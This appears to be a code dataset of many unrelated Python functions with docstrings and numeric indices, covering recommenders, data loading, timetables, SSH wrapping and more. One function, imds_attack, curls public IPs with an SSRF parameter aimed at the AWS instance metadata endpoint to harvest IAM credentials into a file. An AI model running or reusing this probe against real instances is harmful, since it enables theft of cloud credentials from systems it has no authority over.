def recommend(uid, data, model, top_n = 100): """ Recommend the top_n movies that the user has not rated yet, using a trained Surprise model Parameters ---------- uid : int user id data : surprise object with data The entire system, ratings of users (Constructed with reader from surprise) model : surprise object Trained algorithm top_n : int The number of movies to recommend Returns ------- np.ndarray ids of the recommended movies np.ndarray predicted ratings for the recommended movies data_update predicted movies and ratings in the movielens format (uid, iid, rating) """ all_movie_ids = data.df['iid'].unique() uid_rated = data.df[data.df['uid'] == uid]['iid'] movies_to_recommend = np.setdiff1d(all_movie_ids, uid_rated) if len(movies_to_recommend) == 0: print('NO MOVIES TO RECOMMEND!') prediction_set = [[uid, iid, 0] for iid in movies_to_recommend] # here 0 is arbitrary, ratings don't matter predictions = model.test(prediction_set) pred_ratings = np.array([pred.est for pred in predictions]) top = pred_ratings.argsort()[::-1][:top_n] data_update = pd.DataFrame([[uid, movies_to_recommend[top][i], pred_ratings[top][i]] for i in range(top_n)], columns = ['uid', 'iid', 'rating']) return movies_to_recommend[top], pred_ratings[top], data_update
23,931
def threading_data(data=None, fn=None, thread_count=None, path = None): """Process a batch of data by given function by threading. Usually be used for data augmentation. Parameters ----------- data : numpy.array or others The data to be processed. thread_count : int The number of threads to use. fn : function The function for data processing. more args : the args for `fn` Ssee Examples below. Returns ------- list or numpyarray The processed results. References ---------- - `python queue <https://pymotw.com/2/Queue/index.html#module-Queue>`__ - `run with limited queue <http://effbot.org/librarybook/queue.htm>`__ """ def apply_fn(results, i, data, path): path = os.path.join(path, data) results[i] = fn(path) if thread_count is None: results = [None] * len(data) threads = [] # for i in range(len(data)): # t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, data[i], kwargs)) for i, d in enumerate(data): t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, d, path)) t.start() threads.append(t) else: divs = np.linspace(0, len(data), thread_count + 1) divs = np.round(divs).astype(int) results = [None] * thread_count threads = [] for i in range(thread_count): t = threading.Thread( name='threading_and_return', target=apply_fn, args=(results, i, data[divs[i]:divs[i + 1]], path) ) t.start() threads.append(t) for t in threads: t.join() if thread_count is None: try: return np.asarray(results, dtype=object) except Exception: return results else: return np.concatenate(results)
23,932
def read_line_from_stream(stream): """Read a line filtering out blank lines and comments """ for line in stream: line = line.strip() if len(line) > 0 and not line.startswith('#'): yield line
23,933
def cluster_info(arr): """ number of clusters (nonzero fields separated by 0s) in array and size of cluster """ data = [] k2coord = [] coord2k = np.empty_like(arr).astype(np.int64) k = -1 new_cluster = True for i in range(0,len(arr)): if arr[i] == 0: new_cluster = True coord2k[i] = -1 else: if new_cluster == True: k += 1 k2coord.append([i]) data.append(0) else: k2coord[k].append(i) data[k] += 1 coord2k[i] = k new_cluster = False Ncl = len(data) # number of clusters Nk = data # Nk[k] = size of cluster k return Ncl, Nk, k2coord, coord2k
23,934
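A small run of the function above, assuming it is in scope. Note that, as written, each cluster's count in `Nk` starts from 0, so it is one less than the number of nonzero cells in the cluster.

    import numpy as np

    arr = np.array([0, 1, 1, 0, 0, 1, 1, 1])
    Ncl, Nk, k2coord, coord2k = cluster_info(arr)
    print(Ncl)       # 2
    print(Nk)        # [1, 2]  (counts start at 0 per cluster, see note above)
    print(k2coord)   # [[1, 2], [5, 6, 7]]
    print(coord2k)   # [-1  0  0 -1 -1  1  1  1]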
def set_or_none(list_l): """Function to avoid list->set transformation to return set={None}.""" if list_l == [None]: res = None else: res = set(list_l) return res
23,935
def case_mismatch(vm_type, param): """Return True if vm_type matches a portion of param in a case insensitive search, but does not equal that portion; return False otherwise. The "portions" of param are delimited by "_". """ re_portion = re.compile( "(^(%(x)s)_)|(_(%(x)s)_)|(_(%(x)s)$)" % dict(x=vm_type), re.IGNORECASE ) found = re_portion.search(param) if found: param_vm_type = [x for x in found.groups()[1::2] if x][0] return param_vm_type != vm_type else: return False
23,936
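Example calls for the helper above (assumed in scope); the parameter strings are hypothetical.

    print(case_mismatch("flavor", "small_FLAVOR_id"))  # True: present but case differs
    print(case_mismatch("flavor", "small_flavor_id"))  # False: exact-case match
    print(case_mismatch("flavor", "small_taste_id"))   # False: not present at all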
def _async_os(cls): """ Aliases for aiofiles.os""" return aiofiles.os
23,937
def corruption_function(x: torch.Tensor): """ Applies a Gaussian blur to x """ return torchdrift.data.functional.gaussian_blur(x, severity=5)
23,938
def filter_by_filename(conn, im_ids, imported_filename): """Filter list of image ids by originalFile name Sometimes we know the filename of an image that has been imported into OMERO but not necessarily the image ID. This is frequently the case when we want to annotate a recently imported image. This funciton will help to filter a list of image IDs to only those associated with a particular filename. Parameters ---------- conn : ``omero.gateway.BlitzGateway`` object OMERO connection. im_ids : list of int List of OMERO image IDs. imported_filename : str The full filename (with extension) of the file whose OMERO image we are looking for. NOT the path of the image. Returns ------- filtered_im_ids : list of int Filtered list of images with originalFile name matching ``imported_filename``. Notes ----- This function should be used as a filter on an image list that has been already narrowed down as much as possible. Note that many different images in OMERO may share the same filename (e.g., image.tif). Examples -------- >>> im_ids = get_image_ids(conn, dataset=303) >>> im_ids = filter_by_filename(conn, im_ids, "feb_2020.tif")] """ q = conn.getQueryService() params = Parameters() params.map = {"oname": rstring(imported_filename)} results = q.projection( "SELECT i.id FROM Image i" " JOIN i.fileset fs" " JOIN fs.usedFiles u" " JOIN u.originalFile o" " WHERE o.name=:oname", params, conn.SERVICE_OPTS ) im_id_matches = [r[0].val for r in results] return list(set(im_ids) & set(im_id_matches))
23,939
def get_count(): """ :return: the current value of the counter """ counter = Counters.query.filter(Counters.id == 1).first() return make_succ_response(0) if counter is None else make_succ_response(counter.count)
23,940
def test_search_cuisine_higher_page(client): """Test getting results from a higher page""" page_number = 1 resp = client.open('/search/by_cuisine', query_string={"q": "british", "page": page_number}) assert resp.status_code == server.HTTP_OK assert resp.is_json response_dict = resp.get_json() assert response_dict['page'] == page_number assert len(response_dict['results']) == 0
23,941
def test_crossval_Melanoma(): """ Tests the cross val function that creates the train and test data. """ data = ImportMelanoma() train_X, test_X = split_data(data) full_X = impute(train_X) print(ma.corrcoef(ma.masked_invalid(full_X.flatten()), ma.masked_invalid(test_X.flatten())))
23,942
def test_parse_results(results): """Tests parse_results""" r = parse_results(results) assert isinstance(r, list) for k in ['userEntryCount', 'siteScreenName', 'rank', 'points', 'salaryUsed', '_contestId', 'lineup']: assert k in random.choice(r)
23,943
def save_result(model, img, result, score_thr=0.3, out_file="res.png"): """Save the detection results on the image. Args: model (nn.Module): The loaded detector. img (str or np.ndarray): Image filename or loaded image. result (tuple[list] or list): The detection result, can be either (bbox, segm) or just bbox. score_thr (float): The threshold to visualize the bboxes and masks. out_file (str): Specifies where to save the visualization result """ if hasattr(model, "module"): model = model.module model.show_result( img, result, score_thr=score_thr, show=False, out_file=out_file, bbox_color=(72, 101, 241), text_color=(72, 101, 241), )
23,944
def run(): """Creates a matrix with the numbers 0-8 and then reshapes them 3 by 3""" A = numpy.arange(9).reshape((3, 3)) """Here we print matrix A, which holds the values 0 through 8, 3 by 3""" print(A) """Here we print the result of our function""" print(rebenale_primera_ultima_col(A))
23,945
def perm(x, y=None): """Return the number of ways to choose y items from x items without repetition and with order.""" if not isinstance(x, int) or (not isinstance(y, int) and y is not None): raise ValueError(f"Expected integers. Received [{type(x)}] {x} and [{type(y)}] {y}") return math.perm(x, y)
23,946
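The underlying arithmetic, for reference: `math.perm(n, k)` is n! / (n - k)! and requires Python 3.8+; with the second argument omitted it falls back to n!.

    import math

    print(math.perm(5, 2))  # 20  = 5 * 4
    print(math.perm(5))     # 120 = 5!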
def check_if_need_update(source, year, states, datadir, clobber, verbose): """ Do we really need to download the requested data? Only case in which we don't have to do anything is when the downloaded file already exists and clobber is False. """ paths = paths_for_year(source=source, year=year, states=states, datadir=datadir) need_update = False message = None for path in paths: if os.path.exists(path): if clobber: message = f'{source} data for {year} already present, CLOBBERING.' need_update = True else: message = f'{source} data for {year} already present, skipping.' else: message = '' need_update = True # if verbose and message is not None: logging.info(message) return need_update
23,947
def main(argv, cfg=None): """Main method""" # Replace stdout and stderr with /dev/tty, so we don't mess up with scripts # that use ssh in case we error out or similar. if cfg is None: cfg = {} try: sys.stdout = open("/dev/tty", "w") sys.stderr = open("/dev/tty", "w") except IOError: pass config = Config(cfg).load() check_exit(argv, config) autodetect_binary(argv, config) # Check that BINARY_SSH is not repassh. # This can happen if the user sets a binary name only (e.g. 'scp') and a # symlink with the same name was set up. # Note that this relies on argv[0] being set sensibly by the caller, # which is not always the case. argv[0] may also just have the binary # name if found in a path. binary_path = os.path.realpath( shutil.which(config.get("BINARY_SSH"))) if argv[0]: ssh_ident_path = os.path.realpath( shutil.which(argv[0])) if binary_path == ssh_ident_path: message = textwrap.dedent("""\ repassh found '{0}' as the next command to run. Based on argv[0] ({1}), it seems like this will create a loop. Please use BINARY_SSH, BINARY_DIR, or change the way repassh is invoked (eg, a different argv[0]) to make it work correctly.""") config.print(message.format(config.get("BINARY_SSH"), argv[0]), loglevel=LOG_ERROR) config.exit(255) parse_command_line(argv, config) identity = find_identity(argv, config) keys = find_keys(identity, config) sshconfig = find_ssh_config(identity, config) agent = AgentManager(identity, sshconfig, config) if not config.get("SSH_BATCH_MODE"): # do not load keys in BatchMode agent.load_unloaded_keys(keys) portknock(argv, config) return agent.run_ssh( argv[1:], cfg.get("stdin", None), cfg.get("stdout", None), cfg.get("stderr", None) )
23,948
def dbenv(): """ Loads the dbenv for a specific region of code, does not unload afterwards Only use when it makes it possible to avoid loading the dbenv for certain code paths Good Example:: # do this @click.command() @click.option('--with-db', is_flag=True) def profile_info(with_db): # read the config file click.echo(profile_config) # load the db only if necessary if with_db: with dbenv(): # gather db statistics for the profile click.echo(db_statistics) This will run very fast without the --with-db flag and slow only if database info is requested Do not use if you will end up loading the dbenv anyway Bad Example:: # don't do this def my_function(): with dbenv(): # read from db # do db unrelated stuff """ load_dbenv_if_not_loaded() yield
23,949
def ui(candles: np.ndarray, period: int = 14, scalar: float = 100, source_type: str = "close", sequential: bool = False) -> Union[float, np.ndarray]: """ Ulcer Index (UI) :param candles: np.ndarray :param period: int - default: 14 :param scalar: float - default: 100 :param source_type: str - default: "close" :param sequential: bool - default: False :return: float | np.ndarray """ candles = slice_candles(candles, sequential) source = get_candle_source(candles, source_type=source_type) highest_close = talib.MAX(source, period) downside = scalar * (source - highest_close) downside /= highest_close d2 = downside * downside res = np.sqrt(talib.SUM(d2, period) / period) return res if sequential else res[-1]
23,950
def test_bilayer_imported(): """ Sample test, will always pass so long as import statement worked. """ assert "bilayer" in sys.modules
23,951
def _padwithzeros(vector, pad_width, iaxis, kwargs): """Pad with zeros""" vector[: pad_width[0]] = 0 vector[-pad_width[1] :] = 0 return vector
23,952
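A sketch of how such a padding callback is passed to `numpy.pad`; it behaves like mode='constant' with zeros. The example array is arbitrary.

    import numpy as np

    def _padwithzeros(vector, pad_width, iaxis, kwargs):
        vector[: pad_width[0]] = 0
        vector[-pad_width[1]:] = 0      # note: a right pad of 0 would hit the [-0:] slice gotcha
        return vector

    print(np.pad(np.array([1, 2, 3]), 2, _padwithzeros))  # [0 0 1 2 3 0 0]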
def fill_from_sparse_coo(t,elems): """ :param elems: non-zero elements defined in COO format (tuple(indices),value) :type elems: list[tuple(tuple(int),value)] """ for e in elems: t[e[0]]=e[1] return t
23,953
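A small usage example, assuming the function above is in scope and `t` is anything indexable by index tuples (a dense numpy array is used here).

    import numpy as np

    t = np.zeros((2, 3))
    elems = [((0, 1), 5.0), ((1, 2), -1.0)]   # ((row, col), value) pairs in COO style
    print(fill_from_sparse_coo(t, elems))
    # [[ 0.  5.  0.]
    #  [ 0.  0. -1.]]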
def download_responses(survey_id): """Download survey responses.""" if request.method == 'GET': csv = survey_service.download_responses(survey_id) return Response( csv, mimetype='text/csv', headers={'Content-disposition': 'attachment; filename=surveydata.csv'})
23,954
def array_shift(data: Iterable, shift: int) -> Deque: """ left(-) or right(+) shift of array >>> arr = range(10) >>> array_shift(arr, -3) deque([3, 4, 5, 6, 7, 8, 9, 0, 1, 2]) >>> array_shift(arr, 3) deque([7, 8, 9, 0, 1, 2, 3, 4, 5, 6]) """ from collections import deque deq = deque(data) deq.rotate(shift) return deq
23,955
def convert_to_timetable(trains): """ Convert train data into timetable data Args: trains (list of list of `Section`): train data Returns: timetable (list): timetable data timetable[from_station][to_station][dep_time] = (from_time, to_time) -> tuple of boarding and alighting times (minutes since 0:00) when travelling from from_station to to_station on the earliest available train, given that the current time is dep_time """ max_time = 1 + max([section.to_time for train in trains for section in train]) n_stations = len(set([section.to_station for train in trains for section in train])) timetable = [[[(max_time, max_time) for _ in range(max_time)] for _ in range(n_stations)] for _ in range(n_stations)] # Step0: build a graph (adj) over (time, station) nodes for the searches in the next steps adj = defaultdict(list) target_time_flag = [0 for _ in range(max_time)] for train in trains: for section in train: adj[(section.from_time, section.from_station)].append((section.to_time, section.to_station)) target_time_flag[section.from_time] = 1 target_time_flag[section.to_time] = 1 target_times = [t for t in range(max_time) if target_time_flag[t] == 1] for station in range(n_stations): for from_time, to_time in zip(target_times[:-1], target_times[1:]): adj[(from_time, station)].append((to_time, station)) # Step1: register the entries where departure time == boarding time for train in trains: for section in train: # find the earliest arrival time at every other station with a BFS min_to_time = [max_time for _ in range(n_stations)] min_to_time[section.from_station] = section.from_time que = deque([(section.from_time, section.from_station)]) visited = defaultdict(int) visited[(section.from_time, section.from_station)] = 1 while len(que) > 0: from_time, from_station = que.popleft() for to_time, to_station in adj[(from_time, from_station)]: if visited[(to_time, to_station)] == 1: continue min_to_time[to_station] = min(to_time, min_to_time[to_station]) que.append((to_time, to_station)) visited[(to_time, to_station)] = 1 # register the entries where departure time == boarding time for to_station in range(n_stations): if to_station == section.from_station: continue to_time = min_to_time[to_station] if to_time == max_time: continue timetable[section.from_station][to_station][section.from_time] = (section.from_time, to_time) # Step2: register the entries where departure time != boarding time # For example, take the first train from station 1 to station 2, departing at 5:00 (300) and arriving at 5:05 (305). # Step1 registers timetable[1][2][300] = (300, 305). # Even if we leave station 1 before 5:00 (300), we simply wait at station 1 and board that same train, # so timetable[1][2][t] = (300, 305) should hold for every t < 300. # Step1 does not fill in these entries, so we fill them in here. for t in range(max_time - 2, - 1, - 1): for from_station in range(n_stations): for to_station in range(n_stations): timetable[from_station][to_station][t] = \ min(timetable[from_station][to_station][t], timetable[from_station][to_station][t + 1]) return timetable
23,956
def parents(level, idx): """ Return all the (grand-)parents of the Healpix pixel idx at level (in nested format) :param level: Resolution level :param idx: Pixel index :return: All the parents of the pixel """ assert idx < 12 * 2 ** (2 * level) plpairs = [] for ind in range(level, 0, -1): idx = int(math.floor(idx / 4)) plpairs.append(tuple((ind - 1, idx))) level -= 1 return plpairs[::-1]
23,957
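A worked call for the helper above (assumed in scope): in the nested scheme every parent index is floor(child / 4), one resolution level up.

    print(parents(3, 37))
    # [(0, 0), (1, 2), (2, 9)]   # 37 -> 9 -> 2 -> 0 going up the levels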
def precise_inst_ht(vert_list, spacing, offset): """ Uses a set of Vertical Angle Observations taken to a levelling staff at regular intervals to determine the height of the instrument above a reference mark :param vert_list: List of Vertical (Zenith) Angle Observations (minimum of 3) in Decimal Degrees format :param spacing: Distance in metres between each vertical angle observation :param offset: Lowest observed height above reference mark :return: Instrument Height above reference mark and its standard deviation """ if len(vert_list) < 3: raise ValueError('ValueError: 3 or more vertical angles required') vert_list.sort(reverse=True) vert_pairs = [(va1, va2) for va1, va2 in zip(vert_list, vert_list[1:])] base_ht = [] height_comp = [] for num, pair in enumerate(vert_pairs): base_ht_pair = offset + num * spacing base_ht.append(base_ht_pair) dist_a = sin(radians(pair[1])) * (spacing / (sin(radians(pair[0] - pair[1])))) delta_ht = dist_a * (sin(radians(pair[0] - 90))) height_comp.append(delta_ht + base_ht[num]) return round(mean(height_comp), 5), round(stdev(height_comp), 5)
23,958
def plot_trades(strategy, benchmark=None): """ Plot Trades: benchmark is the equity curve that the trades get plotted on. If not provided, the strategy equity curve is used. Both arguments are daily balances. """ if benchmark is None or strategy is benchmark: benchmark = strategy label = 'strategy' else: label = 'benchmark' fig = plt.figure() axes = fig.add_subplot(111, ylabel='Portfolio value in $') axes.plot(benchmark.index, benchmark['close'], label=label) # buy trades s = strategy['state'] == pf.TradeState.OPEN s = s.reindex_like(benchmark) buy = benchmark[s] axes.plot(buy.index, buy['close'], '^', markersize=10, color='k') # sell trades s = strategy['state'] == pf.TradeState.CLOSE s = s.reindex_like(benchmark) sell = benchmark[s] axes.plot(sell.index, sell['close'], 'v', markersize=10, color='r') plt.legend(loc='best')
23,959
def _parse_transform_set(transform_dict, imputer_string, n_images=None): """Parse a dictionary read from yaml into a TransformSet object Parameters ---------- transform_dict : dictionary The dictionary as read from the yaml config file containing config key-value pairs imputer_string : string The name of the imputer (could be None) n_images : int > 0 The number of images being read in. Required because we need to create a new image transform for each image Returns ------- image_transforms : list A list of image Transform objects imputer : Imputer An Imputer object global_transforms : list A list of global Transform objects """ image_transforms = [] global_transforms = [] if imputer_string in _imputers: imputer = _imputers[imputer_string]() else: imputer = None if transform_dict is not None: for t in transform_dict: if type(t) is str: t = {t: {}} key, params = list(t.items())[0] if key in _image_transforms: image_transforms.append([_image_transforms[key](**params) for k in range(n_images)]) elif key in _global_transforms: global_transforms.append(_global_transforms[key](**params)) return image_transforms, imputer, global_transforms
23,960
def query_fields_of_study(subscription_key, ids=None, levels=None, fields=['Id', 'DFN', 'FL', 'FP.FId', 'FC.FId'], # id, display_name, level, parent_ids, children_ids query_count=1000, results_limit=None): """Queries the MAG for fields of study. Expect >650k results for all levels. Args: subscription_key (str): MAG api subscription key ids: (:obj:`list` of `int`): field of study ids to query levels (:obj:`list` of `int`): levels to extract. 0 is highest, 5 is lowest fields (:obj:`list` of `str`): codes of fields to return, as per mag documentation query_count (int): number of items to return from each query results_limit (int): break and return as close to this number of results as the offset and query_count allow (for testing) Returns: (:obj:`list` of `dict`): processed results from the api query """ if ids is not None and levels is None: expr_args = (ids, 'Id') elif levels is not None and ids is None: expr_args = (levels, 'FL') else: raise TypeError("Field of study ids OR levels should be supplied") field_mapping = {'Id': 'id', 'DFN': 'name', 'FL': 'level', 'FP': 'parent_ids', 'FC': 'child_ids'} fields_to_drop = ['logprob', 'prob'] fields_to_compact = ['parent_ids', 'child_ids'] for expr in build_expr(*expr_args): logging.info(expr) count = 1000 offset = 0 while True: fos_data = query_mag_api(expr, fields, subscription_key=subscription_key, query_count=count, offset=offset) if fos_data['entities'] == []: logging.info("Empty entities returned, no more data") break # clean up and formatting for row in fos_data['entities']: for f in fields_to_drop: del row[f] for code, description in field_mapping.items(): try: row[description] = row.pop(code) except KeyError: pass for field in fields_to_compact: try: row[field] = ','.join(str(ids['FId']) for ids in row[field]) except KeyError: # no parents and/or children pass logging.info(f'new fos: {row}') yield row offset += len(fos_data['entities']) logging.info(offset) if results_limit is not None and offset >= results_limit: break
23,961
def send_pair(pin: int, b: bool) -> None: """Data is encoded as two bits when transmitted: value 0 = transmitted 01 value 1 = transmitted 10 """ send_bit(pin, b) send_bit(pin, not b)
23,962
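A minimal, hardware-free sketch of the two-bit encoding described above; `send_bit` here is a stand-in that just prints, not the real GPIO routine, and the pin number is arbitrary.

    def send_bit(pin: int, b: bool) -> None:
        print(1 if b else 0, end="")      # stand-in for the real GPIO pulse

    def send_pair(pin: int, b: bool) -> None:
        send_bit(pin, b)
        send_bit(pin, not b)

    for bit in (True, False, True):
        send_pair(17, bit)
    print()                               # output: 100110  (1 -> 10, 0 -> 01)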
def initialize_train_test_dataset(dataset): """ Create train and test dataset by random sampling. pct: percentage of training """ pct = 0.80 if dataset in ['reddit', 'gab']: dataset_fname = './data/A-Benchmark-Dataset-for-Learning-to-Intervene-in-Online-Hate-Speech-master/' + dataset + '.csv' xlist, ylist, zlist = read_EMNLP2019(dataset_fname) hate_num = 0 for y in ylist: for i in y.strip('[]').split(', '): hate_num += 1 X_text, Y_text = [], [] line_num = 0 for x, y, z in zip(xlist, ylist, zlist): x = x.strip().split('\n') for i in y.strip('[]').split(', '): X_text.append('. '.join(x[int(i) - 1].split('. ')[1:]).strip('\t')) # Only the hate speech line. temp = [] for j in split_response_func(z): if j.lower() == 'n/a': continue temp.append(j) Y_text.append(temp) line_num += 1 elif dataset == 'conan': all_text = [json.loads(line) for line in open('./data/CONAN/CONAN.json', 'r')] EN_text = [x for x in all_text[0]['conan'] if x['cn_id'][:2] == 'EN'] X_text = [x['hateSpeech'].strip() for x in EN_text] Y_text = [[x['counterSpeech'].strip()] for x in EN_text] hate_num = len(X_text) random_index = [x for x in range(hate_num)] random.shuffle(random_index) train_index = sorted(random_index[:int(pct*len(random_index))]) train_x_text = [X_text[i] for i in range(hate_num) if i in train_index] train_y_text = [Y_text[i] for i in range(hate_num) if i in train_index] test_x_text = [X_text[i] for i in range(hate_num) if i not in train_index] test_y_text = [Y_text[i] for i in range(hate_num) if i not in train_index] return train_x_text, train_y_text, test_x_text, test_y_text
23,963
def load_raw_data_xlsx(files): """ Load data from an xlsx file After loading, the date column in the raw data is converted to a UTC datetime Parameters ---------- files : list A list of files to read. See the Notes section for more information Returns ------- list A list containing a DataFrame for each file that was read Notes ----- - Files is an array of maps containing the following data with the keyword (keyword) + ('file_name') the name of the xlsx file + ('date_column') the name of the date_column in the raw_data + ('time_zone') specifier for the timezone the raw data is recorded in + ('sheet_name') name or list of names of the sheets that are to be read + ('combine') boolean, all datasheets with true are combined into one, all others are read individually + ('start_column') Columns between this and ('end_column') are loaded + ('end_column') """ print('Importing XLSX Data...') combined_files = [] individual_files = [] for xlsx_file in files: print('importing ' + xlsx_file['file_name']) # if isinstance(file_name, str): # file_name = [file_name,'UTC'] date_column = xlsx_file['date_column'] raw_data = pd.read_excel(INPATH + xlsx_file['file_name'], xlsx_file['sheet_name'], parse_dates=[date_column]) # convert load data to UTC if(xlsx_file['time_zone'] != 'UTC'): raw_data[date_column] = pd.to_datetime(raw_data[date_column]).dt.tz_localize(xlsx_file['time_zone'], ambiguous="infer").dt.tz_convert('UTC').dt.strftime('%Y-%m-%d %H:%M:%S') else: if (xlsx_file['dayfirst']): raw_data[date_column] = pd.to_datetime(raw_data[date_column], format='%d-%m-%Y %H:%M:%S').dt.tz_localize(None) else: raw_data[date_column] = pd.to_datetime(raw_data[date_column], format='%Y-%m-%d %H:%M:%S').dt.tz_localize(None) if(xlsx_file['data_abs']): raw_data.loc[:, xlsx_file['start_column']:xlsx_file['end_column']] = raw_data.loc[:, xlsx_file['start_column']:xlsx_file['end_column']].abs() # rename column IDs, specifically Time, this will be used later as the df index raw_data.rename(columns={date_column: 'Time'}, inplace=True) raw_data.head() # now the data is positive and set to UTC raw_data.info() # interpolating for missing entries created by asfreq and original missing values if any raw_data.interpolate(method='time', inplace=True) if(xlsx_file['combine']): combined_files.append(raw_data) else: individual_files.append(raw_data) if(len(combined_files) > 0): individual_files.append(pd.concat(combined_files)) return individual_files
23,964
def record_result(board): """Add a chess game result to the database.""" completion_date = datetime.now().strftime(DATE_FORMAT) is_draw = 1 if board.result() == '1/2-1/2' else 0 n_moves = board.fullmove_number if board.turn: # White's turn. # board.fullmove_number is incremented after every black turn. n_moves -= 1 winner = 'white' if board.result() == '1-0' else 'black' if is_draw: winner = None pgn = configure_pgn(board) insert_chess_game(completion_date, is_draw, n_moves, winner, pgn)
23,965
def filter_production_hosts(nr): """ Filter the hosts inventory, which match the production attribute. :param nr: An initialised Nornir inventory, used for processing. :return target_hosts: The targeted nornir hosts after being processed through nornir filtering. """ # Execute filter based on hosts being in production target_hosts = nr.filter(F(production__eq=True)) # Print seperator and header print("=" * 50) print("The hosts running in Production are:") # Iterate over filtered results and printout information for host, data in target_hosts.inventory.hosts.items(): print( f"Host: {Fore.CYAN}{host} " + Fore.RESET + f"- Platform: {Fore.CYAN}{data.platform} " + Fore.RESET + f"- OS Version: {Fore.CYAN}{data['os_version']} " + Fore.RESET + f"- Production?: {Fore.CYAN}{data['production']}" ) # Print total and seperator print(f"Total: {len(target_hosts.inventory.hosts.items())}") print("=" * 50) # Return filtered hosts return target_hosts
23,966
def get_lightmap(map_name="random"): """ Fetches the right lightmap given command line argument. """ assert map_name in ["default", "random"] + list(CONSTANTS.ALL_LIGHTMAPS.keys()), f"Unknown lightmap {map_name}..." if map_name == "random": map_name = random.choice(list(CONSTANTS.ALL_LIGHTMAPS.keys())) elif map_name == "default": map_name = "Subway_Lights" lightmap = sl.LightMap(CONSTANTS.ALL_LIGHTMAPS[map_name]) return lightmap
23,967
def kill_instance(cook_url, instance, assert_response=True, expected_status_code=204): """Kill an instance""" params = {'instance': [instance]} response = session.delete(f'{cook_url}/rawscheduler', params=params) if assert_response: assert expected_status_code == response.status_code, response.text return response
23,968
def _get_n_batch_from_dataloader(dataloader: DataLoader) -> int: """Get a batch number in dataloader. Args: dataloader: torch dataloader Returns: A batch number in dataloader """ n_data = _get_n_data_from_dataloader(dataloader) n_batch = dataloader.batch_size if dataloader.batch_size else 1 return n_data // n_batch
23,969
def test_get_pipeline_id(mock_get_properties, mock_get_details, mock_boto3): """Tests getting the pipeline ID from boto3""" test_pipelines = [{ 'pipelineIdList': [{ "name": "Test Pipeline", "id": "1234" }, { "name": "Other", "id": "5678" }], "hasMoreResults": False }] generated = {"project": "test"} properties = copy.deepcopy(TEST_PROPERTIES) mock_get_details.return_value.data = generated mock_get_properties.return_value = properties mock_boto3.return_value.get_paginator.return_value.paginate.return_value = test_pipelines dp = AWSDataPipeline(app='test_app', env='test_env', region='us-east-1', prop_path='other') dp.get_pipeline_id() assert dp.pipeline_id == '1234'
23,970
def get_hidden() -> list: """ Returns places that should NOT be shown in the addressbook """ return __hidden_places__
23,971
def test_draft_patch_cancel_with_invalid_states(client, jwt, app): """ TODO: This isn't working finish it! Setup: Test: :param client: :param jwt: :param app: :return: """ # Define our data input_fields = build_test_input_fields() custom_names = [{ 'name': 'BLUE HERON TOURS LTD.', 'choice': 1, 'designation': 'LTD.', 'name_type_cd': 'CO', 'consent_words': '', 'conflict1': 'BLUE HERON TOURS LTD.', 'conflict1_num': '0515211', # Custom name has a corp num to make it 'consumed' 'corpNum': '12345' }] input_fields['names'] = custom_names test_nr = create_approved_nr(client, input_fields) assert test_nr is not None # Take the response and edit it # Expect this to fail as we nr_data = {} patch_response = patch_nr(client, NameRequestActions.CANCEL.value, test_nr.get('id'), nr_data) # Ensure the request failed print('Assert that the request failed: ' + str(bool(patch_response.status_code == 500))) patched_nr = json.loads(patch_response.data) assert patched_nr is not None # There should be an error message in the response print('PATCH Response: \n' + json.dumps(patched_nr, sort_keys=True, indent=4, separators=(',', ': ')) + '\n') assert isinstance(patched_nr.get('message'), str)
23,972
def wait_for_unit_state(reactor, docker_client, unit_name, expected_activation_states): """ Wait until a unit is in the requested state. :param IReactorTime reactor: The reactor implementation to use to delay. :param docker_client: A ``DockerClient`` instance. :param unicode unit_name: The name of the unit. :param expected_activation_states: Activation states to wait for. :return: ``Deferred`` that fires when required state has been reached. """ def is_in_states(units): for unit in units: if unit.name == unit_name: if unit.activation_state in expected_activation_states: return True def check_if_in_states(): responded = docker_client.list() responded.addCallback(is_in_states) return responded return loop_until(reactor, check_if_in_states)
23,973
def get_list_primitives(): """Get list of primitive words.""" return g_primitives
23,974
def make_graph(edge_list, threshold=0.0, max_connections=10):
    """Return a two-way graph built from edge_list, keeping only edges whose weight
    exceeds threshold, with at most max_connections connections per node."""
    graph = defaultdict(list)
    edge_list.sort(reverse=True, key=lambda x: x[1])
    for nodes, weight in edge_list:
        a, b = nodes
        if weight > threshold:
            if len(graph[a]) < max_connections:
                graph[a].append(gv.connection(b, weight))
            if len(graph[b]) < max_connections:
                graph[b].append(gv.connection(a, weight))

    print(f'Total graph nodes considered : {len(graph.keys())}')
    print(f'Total graph connections considered : {sum(map(len, graph.values()))}')
    return graph
23,975
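A small usage sketch for make_graph; the node names and weights are invented, and gv.connection refers to whatever gv module the original file imports, which is not shown here.

# Edge list as ((node_a, node_b), weight) tuples, the shape make_graph unpacks.
edges = [
    (("alice", "bob"), 0.9),
    (("alice", "carol"), 0.4),
    (("bob", "carol"), 0.7),
]
graph = make_graph(edges, threshold=0.5, max_connections=2)
# graph["alice"] now holds at most two gv.connection objects, strongest edges first.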
def imds_attack(): """Function to run attack on instances running IMDSv1""" os.system("touch credentials.txt") for ip in public_ip_list: logging.info("Performing SSRF Probe of {ip}".format(ip=ip)) logging.info("") os.system("curl http://{ip}/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ >> credentials.txt".format(ip=ip)) os.system("echo ' ' >> credentials.txt") logging.info("If any credentials are found, they'll be listed below here:") os.system("cat credentials.txt")
23,976
def ping(request): """Ping view.""" checked = {} for service in services_to_check: checked[service.name] = service().check() if all(item[0] for item in checked.values()): return HttpResponse( PINGDOM_TEMPLATE.format(status='OK'), content_type='text/xml', ) else: body = PINGDOM_TEMPLATE.format(status='FALSE') for service_result in filter(lambda x: x[0] is False, checked.values()): body += COMMENT_TEMPLATE.format(comment=service_result[1]) return HttpResponse( body, status=status.HTTP_500_INTERNAL_SERVER_ERROR, content_type='text/xml', )
23,977
def _num_samples(x):
    """Return number of samples in array-like x."""
    message = 'Expected sequence or array-like, got %s' % type(x)
    if hasattr(x, 'fit') and callable(x.fit):
        # Don't get num_samples from an ensemble's length!
        raise TypeError(message)

    if not hasattr(x, '__len__') and not hasattr(x, 'shape'):
        if hasattr(x, '__array__'):
            x = np.asarray(x)
        else:
            raise TypeError(message)

    if hasattr(x, 'shape') and x.shape is not None:
        if len(x.shape) == 0:
            raise TypeError("Singleton array %r cannot be considered" " a valid collection." % x)
        # Check that shape is returning an integer or default to len
        # Dask dataframes may not return numeric shape[0] value
        if isinstance(x.shape[0], numbers.Integral):
            return x.shape[0]

    # Default to len, as described above (e.g. plain sequences, or dataframes
